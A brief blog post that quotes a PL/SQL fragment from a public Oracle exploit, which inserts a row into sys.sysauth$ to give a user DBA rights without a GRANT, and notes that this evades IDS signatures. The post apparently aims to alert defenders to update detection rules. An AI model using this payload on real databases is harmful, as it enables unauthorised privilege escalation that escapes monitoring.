Interesting exploit payload below.
http://www.milw0rm.com/exploits/3177
——————————–
v_commands := 'insert into sys.sysauth$ ' ||
' values' ||
'(' || v_user_id || ',4,' ||
'999,null)';
——————————-
Instead of grant dba to scott the exploit payload inserts the values into sysauth$.
This will bypass many IDS signatures. David mentioned this to me quite a while ago and it is now public so better update those IDS rules.
No comments:
Post a Comment